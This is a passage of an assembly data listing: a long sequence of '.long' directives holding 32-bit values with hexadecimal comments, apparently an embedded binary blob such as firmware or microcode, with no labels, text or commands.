0xb5407102 .long 3221309324 ; 0xc001478c .long 3074461764 ; 0xb7409044 .long 33899404 ; 0x205438c .long 704692352 ; 0x2a00c080 .long 3221255424 ; 0xc0007500 .long 3072365378 ; 0xb7209342 .long 33902484 ; 0x2054f94 .long 3254875714 ; 0xc2017642 .long 3045079552 ; 0xb5803a00 .long 3221242764 ; 0xc000438c .long 3507589660 ; 0xd111921c .long 3657959948 ; 0xda080a0c .long 210544769 ; 0xc8ca881 .long 1485938252 ; 0x58919e4c .long 3221254402 ; 0xc0007102 .long 3389100246 ; 0xca0190d6 .long 3040884992 ; 0xb5403900 .long 3072344972 ; 0xb720438c .long 3507572756 ; 0xd1115014 .long 3657959944 ; 0xda080a08 .long 2655824001 ; 0x9e4ca881 .long 1895979153 ; 0x71025891 .long 2457387008 ; 0x9278c000 .long 1133295392 ; 0x438cb720 .long 3221553667 ; 0xc0050203 .long 1962945024 ; 0x75002a00 .long 2439168000 ; 0x9162c000 .long 947962113 ; 0x3880c101 .long 1133294880 ; 0x438cb520 .long 3040904454 ; 0xb5408506 .long 3040889500 ; 0xb5404a9c .long 1979730716 ; 0x76004b1c .long 2434973696 ; 0x9122c000 .long 1343010688 ; 0x500cb780 .long 3221255436 ; 0xc000750c .long 3221262626 ; 0xc0009122 .long 3078656672 ; 0xb78092a0 .long 1963610124 ; 0x750a500c .long 2449784832 ; 0x9204c000 .long 1250736000 ; 0x4a8cb780 .long 3221255424 ; 0xc0007500 .long 3078656354 ; 0xb7809162 .long 2231518092 ; 0x8502438c .long 1251784000 ; 0x4a9cb540 .long 973128705 ; 0x3a00c401 .long 1133294976 ; 0x438cb580 .long 1343010688 ; 0x500cb780 .long 3221255430 ; 0xc0007506 .long 3078656516 ; 0xb7809204 .long 1962953484 ; 0x75004b0c .long 2439168000 ; 0x9162c000 .long 1133295488 ; 0x438cb780 .long 3040904450 ; 0xb5408502 .long 3355462428 ; 0xc8004b1c .long 3045079552 ; 0xb5803a00 .long 3072344972 ; 0xb720438c .long 3507572756 ; 0xd1115014 .long 3657959944 ; 0xda080a08 .long 2655824001 ; 0x9e4ca881 .long 1895979153 ; 0x71025891 .long 2438512640 ; 0x9158c000 .long 1334622080 ; 0x4f8cb780 .long 3040904450 ; 0xb5408502 .long 168054812 ; 0xa04501c .long 1334621568 ; 0x4f8cb580 .long 1124906880 ; 0x430cb780 .long 2231530752 ; 0x85027500 .long 2437201920 ; 0x9144c000 .long 1133295488 ; 0x438cb780 .long 704693248 ; 0x2a00c400 .long 2231530752 ; 0x85027500 .long 2233655297 ; 0x8522e001 .long 2619514179 ; 0x9c229d43 .long 1518909317 ; 0x5a88b785 .long 3076551936 ; 0xb7607500 .long 3221314060 ; 0xc0015a0c .long 3072365476 ; 0xb72093a4 .long 3078642316 ; 0xb7805a8c .long 706757421 ; 0x2a20432d .long 3074454784 ; 0xb7407500 .long 3074441736 ; 0xb7404208 .long 3221249820 ; 0xc0005f1c .long 3074461826 ; 0xb7409082 .long 2639487004 ; 0x9d53601c .long 2831532096 ; 0xa8c5c040 .long 1511307040 ; 0x5a14b720 .long 438620209 ; 0x1a24d031 .long 1785905154 ; 0x6a72c002 .long 1763561490 ; 0x691dd012 .long 210817585 ; 0xc90d231 .long 1962974795 ; 0x75009e4b .long 1077261632 ; 0x4035b540 .long 210817617 ; 0xc90d251 .long 1076737408 ; 0x402db580 .long 1090572348 ; 0x4100d03c .long 1312338961 ; 0x4e38b411 .long 1076737920 ; 0x402db780 .long 1966653624 ; 0x7538c0b8 .long 2430386176 ; 0x90dcc000 .long 2238890076 ; 0x8572c05c .long 1077785920 ; 0x403db540 .long 1781387281 ; 0x6a2dd011 .long 145805938 ; 0x8b0d272 .long 146330161 ; 0x8b8d231 .long 1077261632 ; 0x4035b540 .long 1078834560 ; 0x404db580 .long 170971697 ; 0xa30d231 .long 2852254216 ; 0xaa01f208 .long 3221255424 ; 0xc0007500 .long 3225325762 ; 0xc03e90c2 .long 3028356278 ; 0xb4810cb6 .long 3528572928 ; 0xd251c000 .long 4060613168 ; 0xf2080a30 .long 3225331841 ; 0xc03ea881 .long 3022064810 ; 0xb4210caa .long 3526475776 ; 0xd231c000 .long 4060613176 ; 0xf2080a38 .long 1962977793 ; 0x7500aa01 .long 2434973696 ; 0x9122c000 .long 1514193408 ; 0x5a40c200 .long 973129729 ; 0x3a00c801 .long 3028356240 ; 0xb4810c90 .long 3528572928 ; 0xd251c000 .long 4060613176 ; 0xf2080a38 .long 1962977793 ; 0x7500aa01 .long 2428682240 ; 0x90c2c000 .long 211992638 ; 0xca2c03e .long 3221271681 ; 0xc000b481 .long 170971761 ; 0xa30d271 .long 2827088392 ; 0xa881f208 .long 210419774 ; 0xc8ac03e .long 3221271585 ; 0xc000b421 .long 2793774114 ; 0xa6859c22 .long 210945086 ; 0xc92c43e .long 3028355586 ; 0xb4810a02 .long 2969812992 ; 0xb103c000 .long 3078636064 ; 0xb7804220 .long 3657980044 ; 0xda08588c .long 3658000517 ; 0xda08a885 .long 3658000649 ; 0xda08a909 .long 3657998729 ; 0xda08a189 .long 3657998465 ; 0xda08a081 .long 214999301 ; 0xcd0a105 .long 3028355586 ; 0xb4810a02 .long 2969812992 ; 0xb103c000 .long 3078636064 ; 0xb7804220 .long 3082835980 ; 0xb7c0580c .long 3657980044 ; 0xda08588c .long 2661656709 ; 0x9ea5a885 .long 2827672072 ; 0xa88ada08 .long 2710166024 ; 0xa189da08 .long 763412488 ; 0x2d80c008 .long 3657987776 ; 0xda0876c0 .long 3657998465 ; 0xda08a081 .long 3221987462 ; 0xc00ba086 .long 3078656258 ; 0xb7809102 .long 168052488 ; 0xa044708 .long 1191753088 ; 0x4708b580 .long 212255824 ; 0xca6c450 .long 3028355586 ; 0xb4810a02 .long 2969812992 ; 0xb103c000 .long 8864288 ; 0x874220 .long 679526449 ; 0x2880c031 .long 3222209031 ; 0xc00f0207 .long 3500419708 ; 0xd0a42a7c .long 3525859425 ; 0xd2285861 .long 42424769 ; 0x28759c1 .long 721211390 ; 0x2afccffe .long 167906440 ; 0xa020c88 .long 3221271681 ; 0xc000b481 .long 1109438723 ; 0x4220b103 .long 1505874342 ; 0x59c1d1a6 .long 3489530119 ; 0xcffe0107 .long 213657980 ; 0xcbc297c .long 3221271681 ; 0xc000b481 .long 1109438723 ; 0x4220b103 .long 3078750343 ; 0xb7820087 .long 3237769354 ; 0xc0fc708a .long 3500419200 ; 0xd0a42880 .long 3072678681 ; 0xb7255b19 .long 3505478288 ; 0xd0f15a90 .long 302524478 ; 0x1208283e .long 1983946402 ; 0x76409ea2 .long 1888138498 ; 0x708ab502 .long 1073986066 ; 0x4003ba12 .long 2430910464 ; 0x90e4c000 .long 1527297925 ; 0x5b08b785 .long 3221386496 ; 0xc0027500 .long 3078984612 ; 0xb78593a4 .long 1962957576 ; 0x75005b08 .long 2176049969 ; 0x81b3e331 .long 19386385 ; 0x127d011 .long 1519171456 ; 0x5a8cb780 .long 209876482 ; 0xc827602 .long 210948097 ; 0xc92d001 .long 2828661256 ; 0xa899f208 .long 679779916 ; 0x28849e4c .long 3076552776 ; 0xb7607848 .long 3221247252 ; 0xc0005514 .long 3624964322 ; 0xd81090e2 .long 168077929 ; 0xa04aa69 .long 2724845584 ; 0xa269d810 .long 2842423312 ; 0xa96bf010 .long 2842488850 ; 0xa96cf012 .long 2150035472 ; 0x8026f010 .long 2191909392 ; 0x82a5e210 .long 2724851728 ; 0xa269f010 .long 2699948048 ; 0xa0edf010 .long 1342748546 ; 0x5008b782 .long 142767360 ; 0x8827500 .long 143839234 ; 0x892d002 .long 167933442 ; 0xa027602 .long 172150786 ; 0xa42d002 .long 3221256264 ; 0xc0007848 .long 3229388994 ; 0xc07c90c2 .long 3657991490 ; 0xda088542 .long 1979883843 ; 0x7602a143 .long 2842947600 ; 0xa973f010 .long 2428813312 ; 0x90c4c000 .long 2854345232 ; 0xaa21da10 .long 2424356864 ; 0x9080c000 .long 2856442376 ; 0xaa41da08 .long 2158093072 ; 0x80a1e310 .long 2859325456 ; 0xaa6dd810 .long 2700210192 ; 0xa0f1f010 .long 168064518 ; 0xa047606 .long 2725107728 ; 0xa26dd810 .long 2435104768 ; 0x9124c000 .long 1200142208 ; 0x4788b780 .long 3045067268 ; 0xb5800a04 .long 3221637000 ; 0xc0064788 .long 2231538176 ; 0x85029200 .long 1201190208 ; 0x4798b540 .long 2439036934 ; 0x9160c006 .long 1519171360 ; 0x5a8cb720 .long 1427420960 ; 0x5514b720 .long 19387184 ; 0x127d330 .long 1127069568 ; 0x432db780 .long 2166539009 ; 0x8122c301 .long 1162196800 ; 0x4545b740 .long 1962945028 ; 0x75002a04 .long 2150101008 ; 0x8027f010 .long 2183262992 ; 0x8221f310 .long 3045066115 ; 0xb5800583 .long 3221308749 ; 0xc001454d .long 1979879586 ; 0x760290a2 .long 2428813312 ; 0x90c4c000 .long 2854345232 ; 0xaa21da10 .long 2424356864 ; 0x9080c000 .long 2856442376 ; 0xaa41da08 .long 2726156304 ; 0xa27dd810 .long 3221321222 ; 0xc0017606 .long 1979748482 ; 0x76009082 .long 2443493376 ; 0x91a4c000 .long 3624957568 ; 0xd8107680 .long 3758270835 ; 0xe002a973 .long 4061170986 ; 0xf2108d2a .long 3624960037 ; 0xd8108025 .long 3221267057 ; 0xc000a271 .long 1988137664 ; 0x768092c0 .long 2842155088 ; 0xa967d850 .long 2368135170 ; 0x8d26e002 .long 2439036928 ; 0x9160c000 .long 2854345232 ; 0xaa21da10 .long 3629151872 ; 0xd8507680 .long 3624970599 ; 0xd810a967 .long 3758269053 ; 0xe002a27d .long 4061170986 ; 0xf2108d2a .long 3629154341 ; 0xd8508025 .long 3078988389 ; 0xb785a265 .long 1962957832 ; 0x75005c08 .long 2464333824 ; 0x92e2c000 .long 1091221376 ; 0x410ab780 .long 3221254152 ; 0xc0007008 .long 2231538244 ; 0x85029244 .long 1545123141 ; 0x5c18b545 .long 209896506 ; 0xc82c43a .long 3028355586 ; 0xb4810a02 .long 2969812992 ; 0xb103c000 .long 3488563744 ; 0xcfef4220 .long 3225037310 ; 0xc03a29fe .long 3026259074 ; 0xb4610c82 .long 3078668288 ; 0xb780c000 .long 1879589130 ; 0x7008410a .long 3489794178 ; 0xd0020882 .long 1980106898 ; 0x76060892 .long 3489729026 ; 0xd0010a02 .long 2017987138 ; 0x78480a42 .long 2453848064 ; 0x9242c000 .long 3041232134 ; 0xb5458506 .long 3292159000 ; 0xc43a5c18 .long 167906434 ; 0xa020c82 .long 3221271681 ; 0xc000b481 .long 1109438723 ; 0x4220b103 .long 964739089 ; 0x3980c011 .long 209895482 ; 0xc82c03a .long 3221271649 ; 0xc000b461 .long 3221321600 ; 0xc0017780 .long 1979748706 ; 0x76009162 .long 2462367744 ; 0x92c4c000 .long 2856442376 ; 0xaa41da08 .long 2842161168 ; 0xa967f010 .long 2834683920 ; 0xa8f5d810 .long 2835011600 ; 0xa8fad810 .long 2149708560 ; 0x8021f310 .long 3624927362 ; 0xd8100082 .long 210018549 ; 0xc84a0f5 .long 2700793872 ; 0xa0fad810 .long 2724589584 ; 0xa265f010 .long 2457911296 ; 0x9280c000 .long 2854345232 ; 0xaa21da10 .long 2843471888 ; 0xa97bf010 .long 2833897552 ; 0xa8e9d850 .long 2834225232 ; 0xa8eed850 .long 2149708560 ; 0x8021f310 .long 3629121666 ; 0xd8500082 .long 210018537 ; 0xc84a0e9 .long 2700007504 ; 0xa0eed850 .long 2725900304 ; 0xa279f010 .long 2860374032 ; 0xaa7dd810 .long 2843734032 ; 0xa97ff010 .long 2841702482 ; 0xa960f052 .long 2850549840 ; 0xa9e7f050 .long 2149708560 ; 0x8021f310 .long 2842685520 ; 0xa96ff050 .long 2726162448 ; 0xa27df010 .long 2183394064 ; 0x8223f310 .long 2833438800 ; 0xa8e2d850 .long 2724327504 ; 0xa261f050 .long 2151149584 ; 0x8037f010 .long 2158092816 ; 0x80a1e210 .long 3629124740 ; 0xd8500c84 .long 4031815906 ; 0xf050a0e2 .long 4031816293 ; 0xf050a265 .long 3082789101 ; 0xb7bfa0ed .long 3084877678 ; 0xb7df7f6e .long 2353037294 ; 0x8c407fee .long 2785385506 ; 0xa6059c22 .long 1494005633 ; 0x590cb781 .long 704692232 ; 0x2a00c008 .long 3221255424 ; 0xc0007500 .long 3078656642 ; 0xb7809282 .long 3072349452 ; 0xb720550c .long 4060634764 ; 0xf2085e8c .long 3070273922 ; 0xb700a982 .long 2659468589 ; 0x9e84452d .long 3078724706 ; 0xb7819c62 .long 3036698892 ; 0xb500590c .long 3489021962 ; 0xcff6400a .long 3045141117 ; 0xb5812a7d .long 3078707468 ; 0xb781590c .long 3222296844 ; 0xc010590c .long 1962945024 ; 0x75002a00 .long 2445459457 ; 0x91c2c001 .long 1586280352 ; 0x5e8cb7a0 .long 1427421088 ; 0x5514b7a0 .long 2821059080 ; 0xa825f208 .long 2659452299 ; 0x9e84058b .long 4064844898 ; 0xf2489c62 .long 2661591585 ; 0x9ea4aa21 .long 3072367714 ; 0xb7209c62 .long 3072676748 ; 0xb725538c .long 3078645264 ; 0xb7806610 .long 2655601195 ; 0x9e49422b .long 3221254216 ; 0xc0007048 .long 4061172258 ; 0xf2109222 .long 4060653985 ; 0xf208a9a1 .long 226928701 ; 0xd86a83d .long 2623708804 ; 0x9c629e84 .long 2854613576 ; 0xaa25f248 .long 2686579216 ; 0xa021f210 .long 159778187 ; 0x986058b .long 2623708836 ; 0x9c629ea4 .long 1494005633 ; 0x590cb781 .long 712888302 ; 0x2a7dcfee .long 1494005121 ; 0x590cb581 .long 1494005537 ; 0x590cb721 .long 3223323139 ; 0xc0200203 .long 1962945024 ; 0x75002a00 .long 2428682240 ; 0x90c2c000 .long 687722462 ; 0x28fdcfde .long 1494005025 ; 0x590cb521 .long 2137962399 ; 0x7f6eb79f .long 2146351039 ; 0x7feeb7bf .long 2619509824 ; 0x9c228c40 .long 2718300217 ; 0xa205f839 .long 1494005633 ; 0x590cb781 .long 2097201200 ; 0x7d00c030 .long 2439168000 ; 0x9162c000 .long 1301067648 ; 0x4d8cb780 .long 704692232 ; 0x2a00c008 .long 3221255424 ; 0xc0007500 .long 4294217858 ; 0xfff49082 .long 3076561810 ; 0xb7609b92 .long 4287909268 ; 0xff944d94 .long 167942913 ; 0xa029b01 .long 211992672 ; 0xca2c060 .long 3221271681 ; 0xc000b481 .long 1301591904 ; 0x4d94b760 .long 2582380532 ; 0x99ebfff4 .long 1200142208 ; 0x4788b780 .long 1966391324 ; 0x7534c01c .long 2433007616 ; 0x9104c000 .long 3041232134 ; 0xb5458506 .long 2231527448 ; 0x85026818 .long 1201190208 ; 0x4798b540 .long 1510520709 ; 0x5a08b785 .long 3221320960 ; 0xc0017500 .long 3078656642 ; 0xb7809282 .long 3072349068 ; 0xb720538c .long 3657975568 ; 0xda084710 .long 2655824013 ; 0x9e4ca88d .long 3221319938 ; 0xc0017102 .long 3072430148 ; 0xb7219044 .long 33773836 ; 0x203590c .long 704692240 ; 0x2a00c010 .long 3221255424 ; 0xc0007500 .long 3223359746 ; 0xc0209102 .long 3038853248 ; 0xb5213880 .long 4294203660 ; 0xfff4590c .long 3078724444 ; 0xb7819b5c .long 3072678156 ; 0xb725590c .long 3072353800 ; 0xb7206608 .long 2231517202 ; 0x85024012 .long 1192801600 ; 0x4718b540 .long 3039103108 ; 0xb5250884 .long 3038799368 ; 0xb5206608 .long 3222814994 ; 0xc0184112 .long 3045145088 ; 0xb5813a00 .long 3078641932 ; 0xb780590c .long 3222293900 ; 0xc0104d8c .long 3221255424 ; 0xc0007500 .long 4294217860 ; 0xfff49084 .long 4193818929 ; 0xf9f89931 .long 2619517469 ; 0x9c22aa1d .long 3078661661 ; 0xb780a61d .long 3509672972 ; 0xd1315c0c .long 3072329920 ; 0xb72008c0 .long 3499245611 ; 0xd092402b .long 1983916176 ; 0x76402890 .long 3221488521 ; 0xc0040389 .long 2231538370 ; 0x850292c2 .long 1612232005 ; 0x6018b545 .long 3490809090 ; 0xd0118502 .long 1962945044 ; 0x75002a14 .long 1469887809 ; 0x579cb541 .long 3041232134 ; 0xb5458506 .long 3221248536 ; 0xc0005a18 .long 3041235074 ; 0xb5459082 .long 3507575448 ; 0xd1115a98 .long 1962945040 ; 0x75002a10 .long 2424487936 ; 0x9082c000 .long 1528345925 ; 0x5b18b545 .long 3225420291 ; 0xc0400203 .long 1962945024 ; 0x75002a00 .long 2424487936 ; 0x9082c000 .long 1536734533 ; 0x5b98b545 .long 1527297925 ; 0x5b08b785 .long 3082843392 ; 0xb7c07500 .long 3221380756 ; 0xc0025e94 .long 3078984162 ; 0xb78591e2 .long 1962957448 ; 0x75005a88 .long 2437201922 ; 0x9144c002 .long 172148745 ; 0xa42c809 .long 175163318 ; 0xa70c7b6 .long 146982921 ; 0x8c2c809 .long 144754618 ; 0x8a0c7ba .long 214091785 ; 0xcc2c809 .long 216057950 ; 0xce0c85e .long 155371529 ; 0x942c809 .long 151046282 ; 0x900c88a .long 222480393 ; 0xd42c809 .long 220252070 ; 0xd20c7a6 .long 163760137 ; 0x9c2c809 .long 161531722 ; 0x9a0c74a .long 230869001 ; 0xdc2c809 .long 231786330 ; 0xdd0c75a .long 205703177 ; 0xc42c809 .long 204523184 ; 0xc30c6b0 .long 138594313 ; 0x842c809 .long 134268542 ; 0x800c67e .long 180537353 ; 0xac2c809 .long 183551638 ; 0xaf0c696 .long 247646217 ; 0xec2c809 .long 247514756 ; 0xec0c684 .long 188925961 ; 0xb42c809 .long 190892206 ; 0xb60c8ae .long 2722755088 ; 0xa249f210 .long 2698113552 ; 0xa0d1f210 .long 2698441232 ; 0xa0d6f210 .long 2707026448 ; 0xa159f210 .long 2706305552 ; 0xa14ef210 .long 2715677200 ; 0xa1ddf210 .long 2713907792 ; 0xa1c2f250 .long 2689004112 ; 0xa046f250 .long 2689200720 ; 0xa049f250 .long 2730881552 ; 0xa2c5f210 .long 2730684944 ; 0xa2c2f210 .long 2739794512 ; 0xa34df250 .long 1561114528 ; 0x5d0cb7a0 .long 2857234960 ; 0xaa4df210 .long 2661588651 ; 0x9ea49eab .long 3687357538 ; 0xdbc89c62 .long 3074468409 ; 0xb740aa39 .long 2231522444 ; 0x8502548c .long 1083880768 ; 0x409ab540 .long 2829177352 ; 0xa8a1d208 .long 2831086152 ; 0xa8bef248 .long 704692240 ; 0x2a00c010 .long 3624432896 ; 0xd8087500 .long 3038814413 ; 0xb520a0cd .long 3221243412 ; 0xc0004614 .long 3078721794 ; 0xb7819102 .long 3225442572 ; 0xc040590c .long 3045145088 ; 0xb5813a00 .long 3078969612 ; 0xb785590c .long 1962957320 ; 0x75005a08 .long 2420293637 ; 0x9042c005 .long 1494005633 ; 0x590cb781 .long 2097201200 ; 0x7d00c030 .long 2424487936 ; 0x9082c000 .long 2593259508 ; 0x9a91fff4 .long 1402255136 ; 0x5394b720 .long 2858808008 ; 0xaa65f2c8 .long 1129166624 ; 0x434db720 .long 3082842184 ; 0xb7c07048 .long 109272724 ; 0x6835e94 .long 2432876544 ; 0x9102c000 .long 2857235024 ; 0xaa4df250 .long 167301426 ; 0x9f8d132 .long 2623708836 ; 0x9c629ea4 .long 1082832672 ; 0x408ab720 .long 3041035522 ; 0xb5428502 .long 1950371992 ; 0x74405098 .long 1360573762 ; 0x5118b542 .long 1368962370 ; 0x5198b542 .long 2430779392 ; 0x90e2c000 .long 2855655952 ; 0xaa35da10 .long 3221254216 ; 0xc0007048 .long 3078984516 ; 0xb7859344 .long 3658504840 ; 0xda105a88 .long 4061178294 ; 0xf210a9b6 .long 2231544009 ; 0x8502a8c9 .long 3040900352 ; 0xb5407500 .long 2232041626 ; 0x850a409a .long 2368004097 ; 0x8d24e001 .long 495230287 ; 0x1d849d4f .long 2623708812 ; 0x9c629e8c .long 2857497104 ; 0xaa51f210 .long 2661551498 ; 0x9ea40d8a .long 3221265506 ; 0xc0009c62 .long 4061171936 ; 0xf21090e0 .long 226929233 ; 0xd86aa51 .long 2623708836 ; 0x9c629ea4 .long 1494005633 ; 0x590cb781 .long 1082832672 ; 0x408ab720 .long 1426896800 ; 0x550cb7a0 .long 3041232130 ; 0xb5458502 .long 3221775896 ; 0xc0086618 .long 3045145088 ; 0xb5813a00 .long 4061157644 ; 0xf210590c .long 2662050369 ; 0x9eabaa41 .long 3038775428 ; 0xb5200884 .long 2661564554 ; 0x9ea4408a .long 3072367714 ; 0xb7209c62 .long 3078641932 ; 0xb780590c .long 1962950953 ; 0x75004129 .long 3221226243 ; 0xc0000303 .long 4060648164 ; 0xf20892e4 .long 4061178273 ; 0xf210a9a1 .long 226666589 ; 0xd82a85d .long 2623708804 ; 0x9c629e84 .long 2686579208 ; 0xa021f208 .long 2823156304 ; 0xa845f250 .long 159555243 ; 0x9829eab .long 2623708804 ; 0x9c629e84 .long 2854345224 ; 0xaa21da08 .long 1888138626 ; 0x708ab582 .long 2441134080 ; 0x9180c000 .long 1443673888 ; 0x560cb720 .long 2854867472 ; 0xaa29d210 .long 1153152832 ; 0x44bbb740 .long 2149708560 ; 0x8021f310 .long 1152103808 ; 0x44abb580 .long 2831798792 ; 0xa8c9d208 .long 3221255232 ; 0xc0007440 .long 3078656290 ; 0xb7809122 .long 2231780620 ; 0x8506450c .long 2702701064 ; 0xa117f208 .long 2428551168 ; 0x90c0c000 .long 1158461312 ; 0x450cb780 .long 2694181384 ; 0xa095f208 .long 1418508064 ; 0x548cb720 .long 1101772672 ; 0x41abb780 .long 1888138626 ; 0x708ab582 .long 1074443648 ; 0x400ab580 .long 1091220864 ; 0x410ab580 .long 2432745472 ; 0x9100c000 .long 1158461312 ; 0x450cb780 .long 2828655112 ; 0xa899da08 .long 1091220768 ; 0x410ab520 .long 2121185183 ; 0x7e6eb79f .long 2129573823 ; 0x7eeeb7bf .long 2137962463 ; 0x7f6eb7df .long 2146351103 ; 0x7feeb7ff .long 2348859394 ; 0x8c00c002 .long 2619513890 ; 0x9c229c22 .long 1073986075 ; 0x4003ba1b .long 2656869977 ; 0x9e5c9e59 .long 1073920515 ; 0x4002ba03 .long 1073986066 ; 0x4003ba12 .long 2656268352 ; 0x9e537040 .long 2436284416 ; 0x9136c000 .long 3221254150 ; 0xc0007006 .long 3356660056 ; 0xc8129158 .long 3221254852 ; 0xc00072c4 .long 2656145792 ; 0x9e519180 .long 3221254146 ; 0xc0007002 .long 2659356860 ; 0x9e8290bc .long 2426454016 ; 0x90a0c000 .long 1892207632 ; 0x70c8cc10 .long 2656083610 ; 0x9e509e9a .long 2786958370 ; 0xa61d9c22 .long 3555788679 ; 0xd3f10787 .long 2662018814 ; 0x9eab2efe .long 3222538626 ; 0xc0140982 .long 2662046189 ; 0x9eab99ed .long 714003442 ; 0x2a8ed3f2 .long 3222538630 ; 0xc0140986 .long 3072367079 ; 0xb72099e7 .long 3074448012 ; 0xb7405a8c .long 3490996124 ; 0xd0145f9c .long 3078625618 ; 0xb7801952 .long 3555869485 ; 0xd3f2432d .long 2653759758 ; 0x9e2d290e .long 1962945056 ; 0x75002a20 .long 2842542112 ; 0xa96dc020 .long 3221225859 ; 0xc0000183 .long 3074461890 ; 0xb74090c2 .long 3223347356 ; 0xc020609c .long 3291785581 ; 0xc434a96d .long 167906462 ; 0xa020c9e .long 3221271681 ; 0xc000b481 .long 1109438727 ; 0x4220b107 .long 1579208994 ; 0x5e20d122 .long 217759798 ; 0xcfac036 .long 3028365864 ; 0xb4813228 .long 3533881344 ; 0xd2a2c000 .long 210001056 ; 0xc845ca0 .long 3022074066 ; 0xb42130d2 .long 155107328 ; 0x93ec000 .long 484491266 ; 0x1ce0c002 .long 3221271617 ; 0xc000b441 .long 1351399296 ; 0x508cb780 .long 1962945032 ; 0x75002a08 .long 2455945228 ; 0x9262c00c .long 2860118024 ; 0xaa79f008 .long 1962945056 ; 0x75002a20 .long 2443362316 ; 0x91a2c00c .long 230866952 ; 0xdc2c008 .long 2567765908 ; 0x990cff94 .long 3263169153 ; 0xc2800281 .long 2660063364 ; 0x9e8d5884 .long 1531171492 ; 0x5b43d2a4 .long 1073986093 ; 0x4003ba2d .long 1585435298 ; 0x5e7fd2a2 .long 3254820457 ; 0xc2009e69 .long 35150453 ; 0x2185a75 .long 1552208674 ; 0x5c84d322 .long 1519374884 ; 0x5a8fd224 .long 3124141710 ; 0xba369e8e .long 3542237187 ; 0xd3224003 .long 2658229887 ; 0x9e715e7f .long 1517666816 ; 0x5a75c200 .long 3525575192 ; 0xd2240218 .long 3224656655 ; 0xc0345b0f .long 146934942 ; 0x8c20c9e .long 3221271585 ; 0xc000b421 .long 227721220 ; 0xd92c004 .long 2565275540 ; 0x98e6ff94 .long 1107998592 ; 0x420ab780 .long 2101272572 ; 0x7d3edffc .long 671877762 ; 0x280c0a82 .long 2416230401 ; 0x9004c001 .long 1116387200 ; 0x428ab780 .long 2101272572 ; 0x7d3edffc .long 2470756352 ; 0x9344c000 .long 1569503008 ; 0x5d8cb720 .long 1076606848 ; 0x402bb780 .long 1645524768 ; 0x6214b720 .long 1653389088 ; 0x628cb720 .long 1511113216 ; 0x5a11c200 .long 1493488166 ; 0x5904d226 .long 2158223888 ; 0x80a3e210 .long 2158748192 ; 0x80abe220 .long 218237698 ; 0xd020b02 .long 1076606368 ; 0x402bb5a0 .long 1078703520 ; 0x404bb5a0 .long 2432745473 ; 0x9100c001 .long 3490804738 ; 0xd0117402 .long 3491840768 ; 0xd0214300 .long 3221308672 ; 0xc0014500 .long 3221786658 ; 0xc0089022 .long 4287892930 ; 0xff940dc2 .long 42047669 ; 0x28198b5 .long 1485095552 ; 0x5884c280 .long 3121782410 ; 0xba129e8a .long 3508682755 ; 0xd1224003 .long 2656132735 ; 0x9e515e7f .long 1517928960 ; 0x5a79c200 .long 3525575192 ; 0xd2240218 .long 3263191307 ; 0xc280590b .long 3271580483 ; 0xc3005b43 .long 3123796100 ; 0xba315884 .long 3271573506 ; 0xc3004002 .long 3254803071 ; 0xc2005a7f .long 40393337 ; 0x2685a79 .long 1527497216 ; 0x5b0bc200 .long 1107998592 ; 0x420ab780 .long 2101272572 ; 0x7d3edffc .long 1116387104 ; 0x428ab720 .long 2437201920 ; 0x9144c000 .long 2088689660 ; 0x7c7edffc .long 1090572305 ; 0x4100d011 .long 1115738129 ; 0x4280d011 .long 2445459460 ; 0x91c2c004 .long 2101272572 ; 0x7d3edffc .long 2464464896 ; 0x92e4c000 .long 1074444833 ; 0x400aba21 .long 2455945216 ; 0x9262c000 .long 1644476224 ; 0x6204b740 .long 1652864864 ; 0x6284b760 .long 3525712388 ; 0xd2261a04 .long 2656393476 ; 0x9e555904 .long 3358629421 ; 0xc8309e2d .long 2654839118 ; 0x9e3da14e .long 3358589197 ; 0xc830010d .long 3221463885 ; 0xc003a34d .long 3121189536 ; 0xba0992a0 .long 3221307402 ; 0xc001400a .long 3072365348 ; 0xb7209324 .long 3074448780 ; 0xb7405d8c .long 3078644228 ; 0xb7806204 .long 2653765675 ; 0x9e2d402b .long 1511113216 ; 0x5a11c200 .long 3525712388 ; 0xd2261a04 .long 3080739076 ; 0xb7a05904 .long 3358614156 ; 0xc830628c .long 3078660430 ; 0xb780a14e .long 2640134187 ; 0x9d5d402b .long 2848380961 ; 0xa9c6d821 .long 1511113216 ; 0x5a11c200 .long 3525712388 ; 0xd2261a04 .long 3623901444 ; 0xd8005904 .long 218278337 ; 0xd02a9c1 .long 1073986075 ; 0x4003ba1b .long 2739783728 ; 0xa34dc830 .long 1073920539 ; 0x4002ba1b .long 2597519348 ; 0x9ad2fff4 .long 1116387200 ; 0x428ab780 .long 1073920548 ; 0x4002ba24 .long 1493488166 ; 0x5904d226 .long 2638678532 ; 0x9d470a04 .long 1493488166 ; 0x5904d226 .long 3360726355 ; 0xc8509d53 .long 3394283942 ; 0xca50a9a6 .long 218278277 ; 0xd02a985 .long 2449522689 ; 0x9200c001 .long 1644476224 ; 0x6204b740 .long 437440529 ; 0x1a12d011 .long 1501876776 ; 0x5984d228 .long 1493487782 ; 0x5904d0a6 .long 3080756781 ; 0xb7a09e2d .long 3490800268 ; 0xd011628c .long 3357542930 ; 0xc8200a12 .long 3358630242 ; 0xc830a162 .long 3525749198 ; 0xd226a9ce .long 2648267012 ; 0x9dd95904 .long 2848835632 ; 0xa9cdc830 .long 2741094432 ; 0xa361c820 .long 1073986075 ; 0x4003ba1b .long 1073920539 ; 0x4002ba1b .long 2594373620 ; 0x9aa2fff4 .long 1116387200 ; 0x428ab780 .long 1073920548 ; 0x4002ba24 .long 1493488166 ; 0x5904d226 .long 2638678532 ; 0x9d470a04 .long 1493488166 ; 0x5904d226 .long 2639503026 ; 0x9d539eb2 .long 2846279760 ; 0xa9a6c850 .long 2844117584 ; 0xa985ca50 .long 1073920552 ; 0x4002ba28 .long 1073986075 ; 0x4003ba1b .long 1073920539 ; 0x4002ba1b .long 2592800756 ; 0x9a8afff4 .long 1073920528 ; 0x4002ba10 .long 1577374370 ; 0x5e04d2a2 .long 306842994 ; 0x124a0d72 .long 1073920516 ; 0x4002ba04 .long 3289685588 ; 0xc4149e54 .long 3121180672 ; 0xba097000 .long 3289399298 ; 0xc4104002 .long 1946185800 ; 0x74007048 .long 3221225475 ; 0xc0000003 .long 268669046 ; 0x10039076 .long 1073920512 ; 0x4002ba00 .long 1577374498 ; 0x5e04d322 .long 13684768 ; 0xd0d020 .long 3120828996 ; 0xba041244 .long 2656321538 ; 0x9e544002 .long 1879098388 ; 0x7000c414 .long 1073920521 ; 0x4002ba09 .long 1883816976 ; 0x7048c410 .long 1585303714 ; 0x5e7dd0a2 .long 1946197449 ; 0x74009dc9 .long 3221291011 ; 0xc0010003 .long 1552352404 ; 0x5c870494 .long 1073986089 